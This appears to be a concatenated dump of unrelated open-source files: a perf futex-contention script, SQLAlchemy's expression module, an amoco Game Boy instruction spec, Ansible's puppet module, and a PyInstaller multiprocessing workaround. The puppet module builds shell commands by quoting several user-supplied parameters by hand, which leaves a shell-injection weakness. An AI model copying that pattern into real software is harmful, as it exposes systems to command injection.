# http://sourceware.org/systemtap/wiki/WSFutexContention
#
# to perf python scripting.
#
# Measures futex contention
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + '/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from Util import *
# Bug fix: process_names was initialized twice (once bare, once with its
# comment); keep only the documented definition below.
thread_thislock = {}    # tid -> futex address the thread is blocked on
thread_blocktime = {}   # tid -> timestamp (ns) when the thread blocked
lock_waits = {} # long-lived stats on (tid,lock) blockage elapsed time
process_names = {} # long-lived pid-to-execname mapping
def syscalls__sys_enter_futex(event, ctxt, cpu, s, ns, tid, comm,
	nr, uaddr, op, val, utime, uaddr2, val3):
	# Record who is about to block on which futex; originators of WAKE
	# (and other non-WAIT) operations are irrelevant to contention.
	if (op & FUTEX_CMD_MASK) != FUTEX_WAIT:
		return
	process_names[tid] = comm
	thread_thislock[tid] = uaddr
	thread_blocktime[tid] = nsecs(s, ns)
def syscalls__sys_exit_futex(event, ctxt, cpu, s, ns, tid, comm,
	nr, ret):
	# Returning from futex(): if we saw this thread block, account the
	# elapsed wait against (tid, lock) and clear the in-flight state.
	# Idiom fix: dict.has_key() is Python-2-only; `in` is equivalent and
	# works on both 2 and 3.
	if tid in thread_blocktime:
		elapsed = nsecs(s, ns) - thread_blocktime[tid]
		add_stats(lock_waits, (tid, thread_thislock[tid]), elapsed)
		del thread_blocktime[tid]
		del thread_thislock[tid]
def trace_begin():
	# Runs until interrupted; the summary is printed from trace_end().
	print "Press control+C to stop and show the summary"
def trace_end():
	# Dump the per-(process, lock) contention statistics gathered by the
	# futex enter/exit hooks above.
	for (tid, lock) in lock_waits:
		min, max, avg, count = lock_waits[tid, lock]
		print "%s[%d] lock %x contended %d times, %d avg ns" % \
		      (process_names[tid], tid, lock, count, avg)
| gpl-2.0 |
aESeguridad/GERE | venv/lib/python2.7/site-packages/sqlalchemy/sql/expression.py | 34 | 5833 | # sql/expression.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Defines the public namespace for SQL expression constructs.
Prior to version 0.9, this module contained all of "elements", "dml",
"default_comparator" and "selectable". The module was broken up
and most "factory" functions were moved to be grouped with their associated
class.
"""
__all__ = [
'Alias', 'ClauseElement', 'ColumnCollection', 'ColumnElement',
'CompoundSelect', 'Delete', 'FromClause', 'Insert', 'Join', 'Select',
'Selectable', 'TableClause', 'Update', 'alias', 'and_', 'asc', 'between',
'bindparam', 'case', 'cast', 'column', 'delete', 'desc', 'distinct',
'except_', 'except_all', 'exists', 'extract', 'func', 'modifier',
'collate', 'insert', 'intersect', 'intersect_all', 'join', 'label',
'literal', 'literal_column', 'not_', 'null', 'nullsfirst', 'nullslast',
'or_', 'outparam', 'outerjoin', 'over', 'select', 'subquery',
'table', 'text',
'tuple_', 'type_coerce', 'union', 'union_all', 'update']
from .visitors import Visitable
from .functions import func, modifier, FunctionElement, Function
from ..util.langhelpers import public_factory
from .elements import ClauseElement, ColumnElement,\
BindParameter, UnaryExpression, BooleanClauseList, \
Label, Cast, Case, ColumnClause, TextClause, Over, Null, \
True_, False_, BinaryExpression, Tuple, TypeClause, Extract, \
Grouping, not_, \
collate, literal_column, between,\
literal, outparam, type_coerce, ClauseList, FunctionFilter
from .elements import SavepointClause, RollbackToSavepointClause, \
ReleaseSavepointClause
from .base import ColumnCollection, Generative, Executable, \
PARSE_AUTOCOMMIT
from .selectable import Alias, Join, Select, Selectable, TableClause, \
CompoundSelect, CTE, FromClause, FromGrouping, SelectBase, \
alias, GenerativeSelect, \
subquery, HasPrefixes, HasSuffixes, Exists, ScalarSelect, TextAsFrom
from .dml import Insert, Update, Delete, UpdateBase, ValuesBase
# factory functions - these pull class-bound constructors and classmethods
# from SQL elements and selectables into public functions. This allows
# the functions to be available in the sqlalchemy.sql.* namespace and
# to be auto-cross-documenting from the function to the class itself.
and_ = public_factory(BooleanClauseList.and_, ".expression.and_")
or_ = public_factory(BooleanClauseList.or_, ".expression.or_")
bindparam = public_factory(BindParameter, ".expression.bindparam")
select = public_factory(Select, ".expression.select")
text = public_factory(TextClause._create_text, ".expression.text")
table = public_factory(TableClause, ".expression.table")
column = public_factory(ColumnClause, ".expression.column")
over = public_factory(Over, ".expression.over")
label = public_factory(Label, ".expression.label")
case = public_factory(Case, ".expression.case")
cast = public_factory(Cast, ".expression.cast")
extract = public_factory(Extract, ".expression.extract")
tuple_ = public_factory(Tuple, ".expression.tuple_")
except_ = public_factory(CompoundSelect._create_except, ".expression.except_")
except_all = public_factory(
CompoundSelect._create_except_all, ".expression.except_all")
intersect = public_factory(
CompoundSelect._create_intersect, ".expression.intersect")
intersect_all = public_factory(
CompoundSelect._create_intersect_all, ".expression.intersect_all")
union = public_factory(CompoundSelect._create_union, ".expression.union")
union_all = public_factory(
CompoundSelect._create_union_all, ".expression.union_all")
exists = public_factory(Exists, ".expression.exists")
nullsfirst = public_factory(
UnaryExpression._create_nullsfirst, ".expression.nullsfirst")
nullslast = public_factory(
UnaryExpression._create_nullslast, ".expression.nullslast")
asc = public_factory(UnaryExpression._create_asc, ".expression.asc")
desc = public_factory(UnaryExpression._create_desc, ".expression.desc")
distinct = public_factory(
UnaryExpression._create_distinct, ".expression.distinct")
true = public_factory(True_._instance, ".expression.true")
false = public_factory(False_._instance, ".expression.false")
null = public_factory(Null._instance, ".expression.null")
join = public_factory(Join._create_join, ".expression.join")
outerjoin = public_factory(Join._create_outerjoin, ".expression.outerjoin")
insert = public_factory(Insert, ".expression.insert")
update = public_factory(Update, ".expression.update")
delete = public_factory(Delete, ".expression.delete")
funcfilter = public_factory(
FunctionFilter, ".expression.funcfilter")
# internal functions still being called from tests and the ORM,
# these might be better off in some other namespace
from .base import _from_objects
from .elements import _literal_as_text, _clause_element_as_expr,\
_is_column, _labeled, _only_column_elements, _string_or_unprintable, \
_truncated_label, _clone, _cloned_difference, _cloned_intersection,\
_column_as_key, _literal_as_binds, _select_iterables, \
_corresponding_column_or_error, _literal_as_label_reference, \
_expression_literal_as_text
from .selectable import _interpret_as_from
# old names for compatibility
_Executable = Executable
_BindParamClause = BindParameter
_Label = Label
_SelectBase = SelectBase
_BinaryExpression = BinaryExpression
_Cast = Cast
_Null = Null
_False = False_
_True = True_
_TextClause = TextClause
_UnaryExpression = UnaryExpression
_Case = Case
_Tuple = Tuple
_Over = Over
_Generative = Generative
_TypeClause = TypeClause
_Extract = Extract
_Exists = Exists
_Grouping = Grouping
_FromGrouping = FromGrouping
_ScalarSelect = ScalarSelect
| gpl-3.0 |
x86Labs/amoco | amoco/arch/z80/spec_gb.py | 6 | 11432 | # -*- coding: utf-8 -*-
# This code is part of Amoco
# Copyright (C) 2012 Axel Tillequin (bdcht3@gmail.com)
# published under GPLv2 license
# spec_xxx files are providers for instruction objects.
# These objects are wrapped and created by disasm.py.
from amoco.logger import *
logger = Log(__name__)
from amoco.arch.core import *
from amoco.arch.z80 import env
# modifications of spec_mostek.ISPECS according to GB specs...
# (all DD/FD prefixed spec are removed IX/IY
# remove unused registers:
del env.ix,env.iy
del env.ir
del env.i, env.r
del env.ixh,env.ixl
del env.iyh,env.iyl
# remove unused flags & conditions:
del env.pf
del env.xf
del env.yf
del env.sf
del env.CONDITION[0b100]
del env.CONDITION[0b101]
del env.CONDITION[0b110]
del env.CONDITION[0b111]
# update flags:
env.cf.pos = 4
env.hf.pos = 5
env.nf.pos = 6
env.zf.pos = 7
# Prefixes are removed (obj.misc['pfx'] is always None)
# simplified getreg8/getreg16
def getreg8(obj, x):
    """Return the 8-bit register operand selected by encoding x."""
    return env.reg8[x]
def getreg16(obj, x):
    """Return the 16-bit register operand selected by encoding x.

    Encoding 0b11 means SP for most instructions; PUSH/POP instead use
    the last reg16 entry (the AF substitution is handled by the caller).
    """
    if x == 0b11 and obj.mnemonic not in ('PUSH', 'POP'):
        return env.sp
    return env.reg16[x]
ISPECS = []
# ----------------
# 8-bit load group
# ----------------
# LD r,r'
@ispec("8<[ 01 rd(3) rs(3) ]", mnemonic='LD')
def mostek_ld(obj,rd,rs):
    # Decode both 8-bit operands; register index 0b110 denotes the (HL)
    # memory operand rather than a register.
    dst,src = getreg8(obj,rd),getreg8(obj,rs)
    if dst._is_mem or src._is_mem:
        # (HL),(HL) is not a valid LD (that encoding is HALT); a prefix
        # is also invalid here -- on the GB, obj.misc['pfx'] is always
        # None (see module comment above), so the second test is a
        # holdover from the Z80 spec this file was derived from.
        if rd==rs or (obj.misc['pfx'] is not None):
            raise InstructionError(obj)
    obj.operands = [dst,src]
    obj.type = type_data_processing
# LD r,n
@ispec("16<[ n(8) 00 r(3) 110 ]", mnemonic='LD')
def mostek_ld(obj,r,n):
dst = getreg8(obj,r)
if r==0b110 and obj.misc['pfx'] is not None:
raise InstructionError(obj)
obj.operands = [dst,env.cst(n,8)]
obj.type = type_data_processing
# LD (BC/DE), A
@ispec("8<[ 000 b rev 010 ]", mnemonic='LD')
def mostek_ld(obj,b,rev):
base = env.reg16[b]
obj.operands = [env.mem(base,8), env.a]
if rev: obj.operands.reverse()
obj.type = type_data_processing
# LDD/LDI a,(hl)
@ispec("8<[ {3a} ]", mnemonic='LDD')
@ispec("8<[ {2a} ]", mnemonic='LDI')
def mostek_ld(obj):
obj.operands = [env.a, env.reg8[0b110]]
obj.type = type_data_processing
@ispec("8<[ {32} ]", mnemonic='LDD')
@ispec("8<[ {22} ]", mnemonic='LDI')
def mostek_ld(obj):
obj.operands = [env.reg8[0b110], env.a]
obj.type = type_data_processing
@ispec("8<[ {f2} ]", mnemonic='LD')
def mostek_ld(obj):
base = env.composer([env.c, env.cst(0xff,8)])
obj.operands = [env.a, env.mem(base,8)]
obj.type = type_data_processing
@ispec("8<[ {e2} ]", mnemonic='LD')
def mostek_ld(obj):
base = env.composer([env.c, env.cst(0xff,8)])
obj.operands = [env.mem(base,8), env.a]
obj.type = type_data_processing
@ispec("16<[ n(8) {f0} ]", mnemonic='LD')
def mostek_ld(obj,n):
base = env.cst(0xff00,16)+n
obj.operands = [env.a, env.mem(base,8)]
obj.type = type_data_processing
@ispec("16<[ n(8) {e0} ]", mnemonic='LD')
def mostek_ld(obj,n):
base = env.cst(0xff00,16)+n
obj.operands = [env.mem(base,8), env.a]
obj.type = type_data_processing
@ispec("24<[ n(16) {fa} ]", mnemonic='LD')
def mostek_ld(obj,n):
base = env.cst(n,16)
obj.operands = [env.a, env.mem(base,8)]
obj.type = type_data_processing
@ispec("24<[ n(16) {ea} ]", mnemonic='LD')
def mostek_ld(obj,n):
base = env.cst(n,16)
obj.operands = [env.mem(base,8), env.a]
obj.type = type_data_processing
# -----------------
# 16-bit load group
# -----------------
# LD dd,nn
@ispec("24<[ nn(16) 00 dd(2) 0001 ]", mnemonic='LD')
def mostek_ld(obj,dd,nn):
dst = getreg16(obj,dd)
obj.operands = [dst,env.cst(nn,16)]
obj.type = type_data_processing
# LD hl,(nn) / LD (nn), hl
@ispec("24<[ nn(16) 00 10 rev 010 ]", mnemonic='LD')
def mostek_ld(obj,rev,nn):
dst = getreg16(obj,0b10)
obj.operands = [dst,env.mem(env.cst(nn,16),16)]
if not rev: obj.operands.reverse()
obj.type = type_data_processing
# LD SP,HL
@ispec("8<[ 1111 1001 ]", mnemonic='LD')
def mostek_ld(obj):
dst = getreg16(obj,0b10)
obj.operands = [env.sp,dst]
obj.type = type_data_processing
# PUSH qq
@ispec("8<[ 11 qq(2) 0101 ]", mnemonic='PUSH')
@ispec("8<[ 11 qq(2) 0001 ]", mnemonic='POP')
def mostek_ld(obj,qq):
src = getreg16(obj,qq)
if src==env.sp: src=env.af
obj.operands = [src]
obj.type = type_data_processing
# LDHL SP,n
@ispec("16<[ n(8) {f8} ]", mnemonic='LDHL')
def mostek_ld(obj,n):
disp = env.cst(n,8).signextend(16)
obj.operands = [env.sp, disp]
obj.type = type_data_processing
# LD (nn), SP
@ispec("24<[ nn(16) {08} ]", mnemonic='LD')
def mostek_ld(obj,nn):
obj.operands = [env.mem(env.cst(nn,16),16), env.sp]
obj.type = type_data_processing
# ----------------------
# 8-bit Arithmetic Group
# ----------------------
# ADD a,r
@ispec("8<[ 1000 0 r(3) ]", mnemonic='ADD')
@ispec("8<[ 1000 1 r(3) ]", mnemonic='ADC')
@ispec("8<[ 1001 0 r(3) ]", mnemonic='SUB')
@ispec("8<[ 1001 1 r(3) ]", mnemonic='SBC')
@ispec("8<[ 1010 0 r(3) ]", mnemonic='AND')
@ispec("8<[ 1011 0 r(3) ]", mnemonic='OR')
@ispec("8<[ 1010 1 r(3) ]", mnemonic='XOR')
@ispec("8<[ 1011 1 r(3) ]", mnemonic='CP')
@ispec("8<[ 00 r(3) 100 ]", mnemonic='INC')
@ispec("8<[ 00 r(3) 101 ]", mnemonic='DEC')
def mostek_arithmetic(obj,r):
if r==0b110 and obj.misc['pfx'] is not None:
raise InstructionError(obj)
src = getreg8(obj,r)
obj.operands = [env.a,src]
if obj.mnemonic in ('INC','DEC'): obj.operands.pop(0)
obj.type = type_data_processing
@ispec("16<[ n(8) 1100 0110 ]", mnemonic='ADD')
@ispec("16<[ n(8) 1100 1110 ]", mnemonic='ADC')
@ispec("16<[ n(8) 1101 0110 ]", mnemonic='SUB')
@ispec("16<[ n(8) 1101 1110 ]", mnemonic='SBC')
@ispec("16<[ n(8) 1110 0110 ]", mnemonic='AND')
@ispec("16<[ n(8) 1111 0110 ]", mnemonic='OR')
@ispec("16<[ n(8) 1110 1110 ]", mnemonic='XOR')
@ispec("16<[ n(8) 1111 1110 ]", mnemonic='CP')
def mostek_arithmetic(obj,n):
obj.operands = [env.a,env.cst(n,8)]
obj.type = type_data_processing
# ADD SP,n
@ispec("16<[ n(8) {e8} ]", mnemonic='ADD')
def mostek_ld(obj,n):
disp = env.cst(n,8).signextend(16)
obj.operands = [env.sp, disp]
obj.type = type_data_processing
# ------------------------------------------------
# General Purpose Arithmetic and CPU Control Group
# ------------------------------------------------
@ispec("8<[ {76} ]", mnemonic='HALT')
@ispec("8<[ {f3} ]", mnemonic='DI')
@ispec("8<[ {fb} ]", mnemonic='EI')
@ispec("8<[ {10} ]", mnemonic='STOP')
def mostek_gpa_cpuc(obj):
obj.operands = []
obj.type = type_cpu_state
@ispec("8<[ {27} ]", mnemonic='DAA')
@ispec("8<[ {2f} ]", mnemonic='CPL')
@ispec("8<[ {3f} ]", mnemonic='CCF')
@ispec("8<[ {37} ]", mnemonic='SCF')
@ispec("8<[ {00} ]", mnemonic='NOP')
def mostek_arithmetic(obj):
obj.operands = []
obj.type = type_data_processing
@ispec("8<[ {d9} ]", mnemonic='RETI')
def mostek_arithmetic(obj):
obj.operands = []
obj.type = type_control_flow
# -----------------------
# 16-bit Arithmetic Group
# -----------------------
@ispec(" 8<[ 00 ss(2) 1001 ]", mnemonic='ADD')
@ispec(" 8<[ 00 ss(2) 0011 ]", mnemonic='INC')
@ispec(" 8<[ 00 ss(2) 1011 ]", mnemonic='DEC')
def mostek_arithmetic(obj,ss):
dst = getreg16(obj,0b10) #hl (or ix/iy)
src = getreg16(obj,ss)
obj.operands = [dst,src]
if obj.mnemonic in ('INC','DEC'): obj.operands.pop(0)
obj.type = type_data_processing
@ispec("16<[ n(8) 1100 0110 ]", mnemonic='ADD')
@ispec("16<[ n(8) 1100 1110 ]", mnemonic='ADC')
@ispec("16<[ n(8) 1101 0110 ]", mnemonic='SUB')
@ispec("16<[ n(8) 1101 1110 ]", mnemonic='SBC')
@ispec("16<[ n(8) 1110 0110 ]", mnemonic='AND')
@ispec("16<[ n(8) 1111 0110 ]", mnemonic='OR')
@ispec("16<[ n(8) 1110 1110 ]", mnemonic='XOR')
@ispec("16<[ n(8) 1111 1110 ]", mnemonic='CP')
def mostek_arithmetic(obj,n):
    # NOTE(review): these eight immediate-operand specs are byte-for-byte
    # duplicates of the registrations in the "8-bit Arithmetic Group"
    # above -- they do not belong in this 16-bit section and look like a
    # copy/paste leftover.  Confirm the ispec registry tolerates duplicate
    # patterns before removing either copy.
    # DD/FD prefix are ignored
    obj.operands = [env.a,env.cst(n,8)]
    obj.type = type_data_processing
# ----------------------
# Rotate and Shift Group
# ----------------------
@ispec("8<[ {07} ]", mnemonic='RLCA')
@ispec("8<[ {17} ]", mnemonic='RLA')
@ispec("8<[ {0f} ]", mnemonic='RRCA')
@ispec("8<[ {1f} ]", mnemonic='RRA')
def mostek_rotshift(obj):
obj.operands = []
obj.type = type_data_processing
@ispec("16<[ 00000 r(3) {cb} ]", mnemonic='RLC')
@ispec("16<[ 00010 r(3) {cb} ]", mnemonic='RL')
@ispec("16<[ 00001 r(3) {cb} ]", mnemonic='RRC')
@ispec("16<[ 00011 r(3) {cb} ]", mnemonic='RR')
@ispec("16<[ 00100 r(3) {cb} ]", mnemonic='SLA')
@ispec("16<[ 00110 r(3) {cb} ]", mnemonic='SWAP') #undocumented
@ispec("16<[ 00101 r(3) {cb} ]", mnemonic='SRA')
@ispec("16<[ 00111 r(3) {cb} ]", mnemonic='SRL')
def mostek_rotshift(obj,r):
if obj.misc['pfx'] is not None:
raise InstructionError(obj)
op1 = getreg8(obj,r)
obj.operands = [op1]
obj.type = type_data_processing
# -----------------------------
# Bit Set, Reset and Test Group
# -----------------------------
# unprefixed BIT & SET:
@ispec("16<[ 01 b(3) r(3) {cb} ]", mnemonic='BIT')
@ispec("16<[ 11 b(3) r(3) {cb} ]", mnemonic='SET')
def mostek_bitset(obj,b,r):
if obj.misc['pfx'] is not None:
raise InstructionError(obj)
op1 = env.cst(b,3)
op2 = getreg8(obj,r)
obj.operands = [op1,op2]
obj.type = type_data_processing
# ----------
# Jump Group
# ----------
@ispec("24<[ nn(16) 11 000 011 ]", mnemonic='JP')
def mostek_jump(obj,nn):
obj.operands = [env.cst(nn,16)]
obj.type = type_control_flow
@ispec("24<[ nn(16) 11 cc(3) 010 ]", mnemonic='JPcc')
def mostek_jump(obj,cc,nn):
if cc>=0b100: raise InstructionError(obj)
obj.cond = env.CONDITION[cc]
obj.operands = [obj.cond[0],env.cst(nn,16)]
obj.type = type_control_flow
@ispec("16<[ e(8) {18} ]", mnemonic='JR')
@ispec("16<[ e(8) {10} ]", mnemonic='DJNZ')
@ispec("16<[ e(8) {38} ]", mnemonic='JRcc', cond=('c',env.cf==1))
@ispec("16<[ e(8) {30} ]", mnemonic='JRcc', cond=('nc',env.cf==0))
@ispec("16<[ e(8) {28} ]", mnemonic='JRcc', cond=('z',env.zf==1))
@ispec("16<[ e(8) {20} ]", mnemonic='JRcc', cond=('nz',env.zf==0))
def mostek_jump(obj,e):
disp = env.cst(e,8).signextend(16)
obj.operands = [disp]
if hasattr(obj,'cond'):
obj.operands.insert(0,obj.cond[0])
obj.type = type_control_flow
@ispec("8<[ {e9} ]", mnemonic='JP')
def mostek_jump(obj):
r = getreg16(obj,0b10)
# is it mem(r,16) ??
obj.operands = [r]
obj.type = type_control_flow
# ---------------------
# Call and Return Group
# ---------------------
@ispec("24<[ nn(16) 1100 1101 ]", mnemonic='CALL')
def mostek_call(obj,nn):
obj.operands = [env.cst(nn,16)]
obj.type = type_control_flow
@ispec("24<[ nn(16) 11 cc(3) 100 ]", mnemonic='CALLcc')
def mostek_call(obj,cc,nn):
if cc>=0b100: raise InstructionError(obj)
obj.cond = env.CONDITION[cc]
obj.operands = [obj.cond[0],env.cst(nn,16)]
obj.type = type_control_flow
@ispec("8<[ {c9} ]", mnemonic='RET')
def mostek_ret(obj):
obj.operands = []
obj.type = type_control_flow
@ispec("8<[ 11 cc(3) 000 ]", mnemonic='RETcc')
def mostek_ret(obj,cc):
if cc>=0b100: raise InstructionError(obj)
obj.cond = env.CONDITION[cc]
obj.operands = [obj.cond[0]]
obj.type = type_control_flow
@ispec("8<[ 11 t(3) 111 ]", mnemonic='RST')
def mostek_rst(obj, t):
    """RST t: call one of the eight fixed restart vectors.

    The 3-bit field t selects the vector 0x00, 0x08, ... 0x38, i.e.
    simply t * 8.
    """
    obj.operands = [env.cst(t * 8, 8)]
    obj.type = type_control_flow
| gpl-2.0 |
gunzy83/ansible-modules-extras | system/puppet.py | 60 | 8853 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
import os
import pipes
import stat
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
# Let snippet from module_utils/basic.py return a proper error in this case
pass
DOCUMENTATION = '''
---
module: puppet
short_description: Runs puppet
description:
- Runs I(puppet) agent or apply in a reliable manner
version_added: "2.0"
options:
timeout:
description:
- How long to wait for I(puppet) to finish.
required: false
default: 30m
puppetmaster:
description:
- The hostname of the puppetmaster to contact.
required: false
default: None
manifest:
description:
- Path to the manifest file to run puppet apply on.
required: false
default: None
facts:
description:
- A dict of values to pass in as persistent external facter facts
required: false
default: None
facter_basename:
description:
- Basename of the facter output file
required: false
default: ansible
environment:
description:
- Puppet environment to be used.
required: false
default: None
logdest:
description:
- Where the puppet logs should go, if puppet apply is being used
required: false
default: stdout
choices: [ 'stdout', 'syslog' ]
version_added: "2.1"
certname:
description:
- The name to use when handling certificates.
required: false
default: None
version_added: "2.1"
tags:
description:
- A comma-separated list of puppet tags to be used.
required: false
default: None
version_added: "2.1"
execute:
description:
- Execute a specific piece of Puppet code. It has no effect with
a puppetmaster.
required: false
default: None
version_added: "2.1"
requirements: [ puppet ]
author: "Monty Taylor (@emonty)"
'''
EXAMPLES = '''
# Run puppet agent and fail if anything goes wrong
- puppet
# Run puppet and timeout in 5 minutes
- puppet: timeout=5m
# Run puppet using a different environment
- puppet: environment=testing
# Run puppet using a specific certname
- puppet: certname=agent01.example.com
# Run puppet using a specific piece of Puppet code. Has no effect with a
# puppetmaster.
- puppet: execute='include ::mymodule'
# Run puppet using a specific tags
- puppet: tags=update,nginx
'''
def _get_facter_dir():
if os.getuid() == 0:
return '/etc/facter/facts.d'
else:
return os.path.expanduser('~/.facter/facts.d')
def _write_structured_data(basedir, basename, data):
if not os.path.exists(basedir):
os.makedirs(basedir)
file_path = os.path.join(basedir, "{0}.json".format(basename))
# This is more complex than you might normally expect because we want to
# open the file with only u+rw set. Also, we use the stat constants
# because ansible still supports python 2.4 and the octal syntax changed
out_file = os.fdopen(
os.open(
file_path, os.O_CREAT | os.O_WRONLY,
stat.S_IRUSR | stat.S_IWUSR), 'w')
out_file.write(json.dumps(data).encode('utf8'))
out_file.close()
def main():
    # Entry point: run `puppet agent` (against a master) or
    # `puppet apply` (local manifest / --execute code) and map puppet's
    # --detailed-exitcodes values onto ansible's changed/failed result.
    module = AnsibleModule(
        argument_spec=dict(
            timeout=dict(default="30m"),
            puppetmaster=dict(required=False, default=None),
            manifest=dict(required=False, default=None),
            logdest=dict(
                required=False, default='stdout',
                choices=['stdout', 'syslog']),
            show_diff=dict(
                # internal code to work with --diff, do not use
                default=False, aliases=['show-diff'], type='bool'),
            facts=dict(default=None),
            facter_basename=dict(default='ansible'),
            environment=dict(required=False, default=None),
            certname=dict(required=False, default=None),
            tags=dict(required=False, default=None, type='list'),
            execute=dict(required=False, default=None),
        ),
        supports_check_mode=True,
        # NOTE(review): the first pair is subsumed by the triple below;
        # confirm and drop one of the two entries.
        mutually_exclusive=[
            ('puppetmaster', 'manifest'),
            ('puppetmaster', 'manifest', 'execute'),
        ],
    )
    p = module.params

    global PUPPET_CMD
    PUPPET_CMD = module.get_bin_path("puppet", False, ['/opt/puppetlabs/bin'])

    if not PUPPET_CMD:
        module.fail_json(
            msg="Could not find puppet. Please ensure it is installed.")

    global TIMEOUT_CMD
    TIMEOUT_CMD = module.get_bin_path("timeout", False)

    if p['manifest']:
        if not os.path.exists(p['manifest']):
            module.fail_json(
                msg="Manifest file %(manifest)s not found." % dict(
                    manifest=p['manifest']))

    # Check if puppet is disabled here
    if not p['manifest']:
        rc, stdout, stderr = module.run_command(
            PUPPET_CMD + " config print agent_disabled_lockfile")
        if os.path.exists(stdout.strip()):
            module.fail_json(
                msg="Puppet agent is administratively disabled.",
                disabled=True)
        elif rc != 0:
            module.fail_json(
                msg="Puppet agent state could not be determined.")

    # Persist any caller-supplied facts before running puppet, so the
    # run can see them (skipped in check mode: writing is a side effect).
    if module.params['facts'] and not module.check_mode:
        _write_structured_data(
            _get_facter_dir(),
            module.params['facter_basename'],
            module.params['facts'])

    # Wrap puppet in coreutils `timeout -s 9` when available so a hung
    # run is killed rather than blocking ansible forever.
    if TIMEOUT_CMD:
        base_cmd = "%(timeout_cmd)s -s 9 %(timeout)s %(puppet_cmd)s" % dict(
            timeout_cmd=TIMEOUT_CMD,
            timeout=pipes.quote(p['timeout']),
            puppet_cmd=PUPPET_CMD)
    else:
        base_cmd = PUPPET_CMD

    # NOTE(review): only timeout/puppetmaster/manifest go through
    # pipes.quote below; environment/tags/certname/execute are wrapped
    # in hand-written single quotes -- confirm these inputs are trusted.
    if not p['manifest']:
        cmd = ("%(base_cmd)s agent --onetime"
            " --ignorecache --no-daemonize --no-usecacheonfailure --no-splay"
            " --detailed-exitcodes --verbose --color 0") % dict(
            base_cmd=base_cmd,
            )
        if p['puppetmaster']:
            cmd += " --server %s" % pipes.quote(p['puppetmaster'])
        if p['show_diff']:
            cmd += " --show_diff"
        if p['environment']:
            cmd += " --environment '%s'" % p['environment']
        if p['tags']:
            cmd += " --tags '%s'" % ','.join(p['tags'])
        if p['certname']:
            cmd += " --certname='%s'" % p['certname']
        if module.check_mode:
            cmd += " --noop"
        else:
            cmd += " --no-noop"
    else:
        cmd = "%s apply --detailed-exitcodes " % base_cmd
        if p['logdest'] == 'syslog':
            cmd += "--logdest syslog "
        if p['environment']:
            cmd += "--environment '%s' " % p['environment']
        if p['certname']:
            cmd += " --certname='%s'" % p['certname']
        if p['execute']:
            cmd += " --execute '%s'" % p['execute']
        if p['tags']:
            cmd += " --tags '%s'" % ','.join(p['tags'])
        if module.check_mode:
            cmd += "--noop "
        else:
            cmd += "--no-noop "
        cmd += pipes.quote(p['manifest'])
    rc, stdout, stderr = module.run_command(cmd)
    # Map puppet's --detailed-exitcodes onto ansible semantics:
    # 0 = no changes, 2 = changes applied, 1 = did not run, 124 = the
    # `timeout` wrapper killed the run; anything else is a failure.
    if rc == 0:
        # success
        module.exit_json(rc=rc, changed=False, stdout=stdout, stderr=stderr)
    elif rc == 1:
        # rc==1 could be because it's disabled
        # rc==1 could also mean there was a compilation failure
        disabled = "administratively disabled" in stdout
        if disabled:
            msg = "puppet is disabled"
        else:
            msg = "puppet did not run"
        module.exit_json(
            rc=rc, disabled=disabled, msg=msg,
            error=True, stdout=stdout, stderr=stderr)
    elif rc == 2:
        # success with changes
        module.exit_json(rc=0, changed=True, stdout=stdout, stderr=stderr)
    elif rc == 124:
        # timeout
        module.exit_json(
            rc=rc, msg="%s timed out" % cmd, stdout=stdout, stderr=stderr)
    else:
        # failure
        module.fail_json(
            rc=rc, msg="%s failed with return code: %d" % (cmd, rc),
            stdout=stdout, stderr=stderr)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
virantha/pypdfocr | pypdfocr/pypdfocr_multiprocessing.py | 1 | 1954 | #!/usr/bin/env python2.7
# Copyright 2013 Virantha Ekanayake All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os, multiprocessing.forking
import logging
""" Special work-around to support multiprocessing and pyinstaller --onefile on windows systms
https://github.com/pyinstaller/pyinstaller/wiki/Recipe-Multiprocessing
"""
import multiprocessing.forking as forking
import os
import sys
class _Popen(multiprocessing.forking.Popen):
    # Process launcher that restores the _MEIPASS2 environment variable
    # around child creation.  PyInstaller --onefile clears _MEIPASS2 on
    # startup; without re-setting it, a child spawned by multiprocessing
    # would unpack a second copy of the bundle instead of reusing this
    # one.  (multiprocessing.forking is Python 2 only.)
    def __init__(self, *args, **kw):
        if hasattr(sys, 'frozen'):
            # We have to set original _MEIPASS2 value from sys._MEIPASS
            # to get --onefile mode working.
            os.putenv('_MEIPASS2', sys._MEIPASS)
        try:
            super(_Popen, self).__init__(*args, **kw)
        finally:
            if hasattr(sys, 'frozen'):
                # On some platforms (e.g. AIX) 'os.unsetenv()' is not
                # available. In those cases we cannot delete the variable
                # but only set it to the empty string. The bootloader
                # can handle this case.
                if hasattr(os, 'unsetenv'):
                    os.unsetenv('_MEIPASS2')
                else:
                    os.putenv('_MEIPASS2', '')
# Monkey-patch the forking module so multiprocessing uses our launcher.
forking.Popen = _Popen
#class Process(multiprocessing.Process):
#_Popen = _Popen
# ...
if __name__ == '__main__':
# On Windows calling this function is necessary.
multiprocessing.freeze_support()
| apache-2.0 |
AndrewSmart/audacity | lib-src/lv2/lv2/plugins/eg01-amp.lv2/waflib/fixpy2.py | 332 | 1110 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os
all_modifs={}
def fixdir(dir):
    """Apply every registered source transform to dir/waflib."""
    global all_modifs
